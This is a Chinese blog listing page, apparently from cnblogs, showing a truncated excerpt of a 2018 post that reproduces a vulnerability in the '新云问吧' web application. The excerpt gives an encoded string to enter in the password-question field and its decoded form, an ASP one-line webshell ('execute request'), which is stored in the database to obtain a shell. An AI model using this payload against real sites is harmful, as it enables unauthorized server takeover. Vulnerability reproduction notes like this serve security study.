会员
周边
众包
新闻
博问
闪存
所有博客
当前博客
我的博客
我的园子
账号设置
简洁模式
...
退出登录
注册
登录
爪爪
博客园
首页
新随笔
联系
管理
2018年11月25日
漏洞复现——新云问吧漏洞
摘要: 漏洞描述:在用户注册或者修改个人资料中,我们可以注入一句话到数据库中,从而拿到shell 漏洞分析:在密码问题处填写“┼攠數畣整爠煥敵瑳∨≡┩愾”,即“<% execute request("a")%>”经过Erlang 中文简体字 GB2312 转 unicode 转换来的,然后确定就可以了 影响
阅读全文
posted @ 2018-11-25 21:41 爪爪**
阅读(408)
评论(0)
推荐(0)
编辑